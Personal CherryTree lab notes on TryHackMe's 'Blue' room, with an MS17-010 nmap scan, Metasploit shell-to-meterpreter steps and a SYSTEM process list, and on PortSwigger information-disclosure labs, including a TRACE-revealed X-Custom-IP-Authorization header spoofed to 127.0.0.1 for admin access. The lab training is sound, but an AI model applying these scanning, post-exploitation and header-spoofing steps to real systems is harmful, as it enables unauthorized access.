<?xml version="1.0" ?>
<cherrytree>
	<node custom_icon_id="0" foreground="" is_bold="False" name="TryHackMe" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1655729934.5" ts_lastsave="1655734586.72" unique_id="1">
		<rich_text></rich_text>
		<node custom_icon_id="0" foreground="" is_bold="False" name="Blue" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1655729940.8" ts_lastsave="1655733543.72" unique_id="2">
			<rich_text link="webs https://tryhackme.com/room/blue">https://tryhackme.com/room/blue</rich_text>
			<rich_text>

Nmap Scanning:

sudo nmap --script vuln 10.10.195.153 

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49160/tcp open  unknown

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       </rich_text>
			<rich_text link="webs https://technet.microsoft.com/en-us/library/security/ms17-010.aspx">https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</rich_text>
			<rich_text>
|       </rich_text>
			<rich_text link="webs https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/">https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</rich_text>
			<rich_text>
|_      </rich_text>
			<rich_text link="webs https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</rich_text>
			<rich_text>
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

start metasploit
sudo msfconsole init -q

set meterpreter to shell
use post/multi/manage/shell_to_meterpreter
set session &lt;meterpreter_session&gt;
sessions -i &lt;new_session&gt;

meterpreter &gt; ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 544   536   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 592   536   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 604   584   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 608   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 644   584   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 692   592   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 700   592   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 708   592   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 724   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 764   692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 816   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 884   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 932   692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1000  644   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
 1020  692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 1064  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1156  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 1300  608   taskeng.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\taskeng.exe
 1324  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1388  692   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1460  692   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\XenTools\LiteAgent.exe
 1600  692   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1660  692   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM
 1748  2932  mscorsvw.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 1924  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 2088  816   WmiPrvSE.exe
 2184  544   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
 2324  2376  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 2340  692   taskhost.exe          x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\taskhost.exe
 2608  692   vds.exe               x64   0        NT AUTHORITY\SYSTEM
 2932  692   mscorsvw.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 2944  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 2968  692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE
 3016  692   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM
</rich_text>
		</node>
	</node>
	<node custom_icon_id="0" foreground="" is_bold="False" name="PortsWigger" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1655734586.72" ts_lastsave="1655736264.39" unique_id="3">
		<rich_text></rich_text>
		<node custom_icon_id="0" foreground="" is_bold="False" name="Information_disclosure" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1655736264.39" ts_lastsave="1655781207.16" unique_id="4">
			<rich_text>1. Error messages
</rich_text>
			<rich_text link="webs https://0adf00cc034e8be9c0a41ca200ca0087.web-security-academy.net/product?productId=2">https://0adf00cc034e8be9c0a41ca200ca0087.web-security-academy.net/product?productId=2</rich_text>
			<rich_text>
on above site expect numerical, input alphabet
</rich_text>
			<rich_text link="webs https://0adf00cc034e8be9c0a41ca200ca0087.web-security-academy.net/product?productId=asd">https://0adf00cc034e8be9c0a41ca200ca0087.web-security-academy.net/product?productId=asd</rich_text>
			<rich_text>
will output error containing apache version Apache Struts 2 2.3.31

2. Debug Page
on view-source:</rich_text>
			<rich_text link="webs https://0a5100320437d297c0082a1e009600cc.web-security-academy.net/">https://0a5100320437d297c0082a1e009600cc.web-security-academy.net/</rich_text>
			<rich_text>
contains comment
 &lt;!-- &lt;a href=/cgi-bin/phpinfo.php&gt;Debug&lt;/a&gt; --&gt;

page </rich_text>
			<rich_text link="webs https://0a5100320437d297c0082a1e009600cc.web-security-academy.net/cgi-bin/phpinfo.php">https://0a5100320437d297c0082a1e009600cc.web-security-academy.net/cgi-bin/phpinfo.php</rich_text>
			<rich_text>
contains secret_key

3. backup file/directory
on </rich_text>
			<rich_text link="webs https://0a8000bb03f384fdc0daae9000cd009e.web-security-academy.net/robots.txt">https://0a8000bb03f384fdc0daae9000cd009e.web-security-academy.net/robots.txt</rich_text>
			<rich_text>

contain directory of backup

in backup contains </rich_text>
			<rich_text link="webs https://0a8000bb03f384fdc0daae9000cd009e.web-security-academy.net/backup/ProductTemplate.java.bak">https://0a8000bb03f384fdc0daae9000cd009e.web-security-academy.net/backup/ProductTemplate.java.bak</rich_text>
			<rich_text>
which have password to postgresql database

4. Information Disclosure due to insecure configuration

login to website using credential wiener:peter

admin directory is here:
</rich_text>
			<rich_text link="webs https://0aaf00a6034984b5c0c6bbd400ff009d.web-security-academy.net/admin">https://0aaf00a6034984b5c0c6bbd400ff009d.web-security-academy.net/admin</rich_text>
			<rich_text>

in browser change the request method to trace, in response you will find base64 encoded message
VFJBQ0UgL2FkbWluIEhUVFAvMS4xDQpIb3N0OiAwYWFmMDBhNjAzNDk4NGI1YzBjNmJiZDQwMGZmMDA5ZC53ZWItc2VjdXJpdHktYWNhZGVteS5uZXQNCkNvb2tpZTogc2Vzc2lvbj1YSDY2V3R0S1IwNU96TDhYSmdVbW53dFpNdk11UmJncA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0OyBydjo5MS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzkxLjANCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2Uvd2VicCwqLyo7cT0wLjgNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KU2VjLUZldGNoLURlc3Q6IGRvY3VtZW50DQpTZWMtRmV0Y2gtTW9kZTogbmF2aWdhdGUNClNlYy1GZXRjaC1TaXRlOiBzYW1lLW9yaWdpbg0KU2VjLUZldGNoLVVzZXI6ID8xDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAsIG5vLWNhY2hlDQpPcmlnaW46IGh0dHBzOi8vMGFhZjAwYTYwMzQ5ODRiNWMwYzZiYmQ0MDBmZjAwOWQud2ViLXNlY3VyaXR5LWFjYWRlbXkubmV0DQpQcmFnbWE6IG5vLWNhY2hlDQpUZTogdHJhaWxlcnMNCkNvbm5lY3Rpb246IGNsb3NlDQpYLUN1c3RvbS1JUC1BdXRob3JpemF0aW9uOiAxMTQuMTI0LjEzMC41Nw0KDQo=

which could be decoded into
TRACE /admin HTTP/1.1
Host: 0aaf00a6034984b5c0c6bbd400ff009d.web-security-academy.net
Cookie: session=XH66WttKR05OzL8XJgUmnwtZMvMuRbgp
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Cache-Control: max-age=0, no-cache
Origin: </rich_text>
			<rich_text link="webs https://0aaf00a6034984b5c0c6bbd400ff009d.web-security-academy.net">https://0aaf00a6034984b5c0c6bbd400ff009d.web-security-academy.net</rich_text>
			<rich_text>
Pragma: no-cache
Te: trailers
Connection: close
X-Custom-IP-Authorization: 114.124.130.57

 Go to &quot;Proxy&quot; &gt; &quot;Options&quot;, scroll down to  the &quot;Match and Replace&quot; section, and click &quot;Add&quot;. Leave the match  condition blank, but in the &quot;Replace&quot; field, enter:                       </rich_text>
			<rich_text family="monospace">X-Custom-IP-Authorization: 127.0.0.1</rich_text>
			<rich_text>
 Burp Proxy will now add this header to every request you send.


</rich_text>
		</node>
	</node>
</cherrytree>
